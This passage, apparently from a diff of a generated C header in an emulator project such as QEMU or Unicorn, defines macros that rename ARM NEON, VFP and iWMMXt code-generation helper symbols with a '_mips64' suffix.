gen_helper_neon_narrow_sat_s32_mips64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mips64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips64 +#define 
gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mips64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mips64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips64 +#define 
gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mips64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mips64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mips64 +#define 
gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mips64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mips64 +#define 
gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips64 +#define gen_helper_pre_smc gen_helper_pre_smc_mips64 +#define gen_helper_qadd16 gen_helper_qadd16_mips64 +#define gen_helper_qadd8 gen_helper_qadd8_mips64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips64 +#define gen_helper_qsub16 gen_helper_qsub16_mips64 +#define gen_helper_qsub8 gen_helper_qsub8_mips64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips64 +#define gen_helper_rbit gen_helper_rbit_mips64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips64 +#define gen_helper_recps_f32 gen_helper_recps_f32_mips64 +#define gen_helper_rintd gen_helper_rintd_mips64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips64 +#define gen_helper_rints gen_helper_rints_mips64 +#define gen_helper_rints_exact gen_helper_rints_exact_mips64 +#define gen_helper_ror_cc gen_helper_ror_cc_mips64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mips64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips64 +#define gen_helper_sadd16 gen_helper_sadd16_mips64 +#define gen_helper_sadd8 gen_helper_sadd8_mips64 
+#define gen_helper_saddsubx gen_helper_saddsubx_mips64 +#define gen_helper_sar_cc gen_helper_sar_cc_mips64 +#define gen_helper_sdiv gen_helper_sdiv_mips64 +#define gen_helper_sel_flags gen_helper_sel_flags_mips64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips64 +#define gen_helper_set_rmode gen_helper_set_rmode_mips64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips64 +#define gen_helper_shadd16 gen_helper_shadd16_mips64 +#define gen_helper_shadd8 gen_helper_shadd8_mips64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips64 +#define gen_helper_shl_cc gen_helper_shl_cc_mips64 +#define gen_helper_shr_cc gen_helper_shr_cc_mips64 +#define gen_helper_shsub16 gen_helper_shsub16_mips64 +#define gen_helper_shsub8 gen_helper_shsub8_mips64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips64 +#define gen_helper_ssat gen_helper_ssat_mips64 +#define gen_helper_ssat16 gen_helper_ssat16_mips64 +#define gen_helper_ssub16 gen_helper_ssub16_mips64 +#define gen_helper_ssub8 gen_helper_ssub8_mips64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips64 +#define gen_helper_sxtb16 gen_helper_sxtb16_mips64 +#define gen_helper_uadd16 gen_helper_uadd16_mips64 +#define gen_helper_uadd8 gen_helper_uadd8_mips64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips64 +#define gen_helper_udiv gen_helper_udiv_mips64 +#define gen_helper_uhadd16 gen_helper_uhadd16_mips64 +#define gen_helper_uhadd8 gen_helper_uhadd8_mips64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mips64 +#define gen_helper_uhsub16 gen_helper_uhsub16_mips64 +#define gen_helper_uhsub8 gen_helper_uhsub8_mips64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips64 +#define gen_helper_uqadd16 gen_helper_uqadd16_mips64 +#define 
gen_helper_uqadd8 gen_helper_uqadd8_mips64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips64 +#define gen_helper_uqsub16 gen_helper_uqsub16_mips64 +#define gen_helper_uqsub8 gen_helper_uqsub8_mips64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips64 +#define gen_helper_usad8 gen_helper_usad8_mips64 +#define gen_helper_usat gen_helper_usat_mips64 +#define gen_helper_usat16 gen_helper_usat16_mips64 +#define gen_helper_usub16 gen_helper_usub16_mips64 +#define gen_helper_usub8 gen_helper_usub8_mips64 +#define gen_helper_usubaddx gen_helper_usubaddx_mips64 +#define gen_helper_uxtb16 gen_helper_uxtb16_mips64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mips64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips64 +#define 
gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mips64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips64 +#define gen_helper_vfp_touhs_round_to_zero 
gen_helper_vfp_touhs_round_to_zero_mips64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mips64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips64 +#define gen_helper_wfe gen_helper_wfe_mips64 +#define gen_helper_wfi gen_helper_wfi_mips64 +#define gen_hvc gen_hvc_mips64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips64 +#define gen_iwmmxt_address gen_iwmmxt_address_mips64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips64 +#define gen_jmp gen_jmp_mips64 +#define gen_load_and_replicate gen_load_and_replicate_mips64 +#define gen_load_exclusive gen_load_exclusive_mips64 +#define gen_logic_CC gen_logic_CC_mips64 +#define gen_logicq_cc gen_logicq_cc_mips64 +#define gen_lookup_tb gen_lookup_tb_mips64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips64 +#define gen_muls_i64_i32 gen_muls_i64_i32_mips64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips64 +#define gen_mulxy gen_mulxy_mips64 +#define gen_neon_add gen_neon_add_mips64 +#define gen_neon_addl gen_neon_addl_mips64 +#define gen_neon_addl_saturate 
gen_neon_addl_saturate_mips64 +#define gen_neon_bsl gen_neon_bsl_mips64 +#define gen_neon_dup_high16 gen_neon_dup_high16_mips64 +#define gen_neon_dup_low16 gen_neon_dup_low16_mips64 +#define gen_neon_dup_u8 gen_neon_dup_u8_mips64 +#define gen_neon_mull gen_neon_mull_mips64 +#define gen_neon_narrow gen_neon_narrow_mips64 +#define gen_neon_narrow_op gen_neon_narrow_op_mips64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips64 +#define gen_neon_negl gen_neon_negl_mips64 +#define gen_neon_rsb gen_neon_rsb_mips64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips64 +#define gen_neon_subl gen_neon_subl_mips64 +#define gen_neon_trn_u16 gen_neon_trn_u16_mips64 +#define gen_neon_trn_u8 gen_neon_trn_u8_mips64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips64 +#define gen_neon_unzip gen_neon_unzip_mips64 +#define gen_neon_widen gen_neon_widen_mips64 +#define gen_neon_zip gen_neon_zip_mips64 +#define gen_new_label gen_new_label_mips64 +#define gen_nop_hint gen_nop_hint_mips64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mips64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips64 +#define 
gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mips64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips64 +#define 
gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mips64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mips64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhsb_M0 
gen_op_iwmmxt_unpackhsb_M0_mips64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips64 +#define gen_rev16 gen_rev16_mips64 +#define gen_revsh gen_revsh_mips64 +#define gen_rfe gen_rfe_mips64 +#define gen_sar gen_sar_mips64 +#define gen_sbc_CC gen_sbc_CC_mips64 +#define 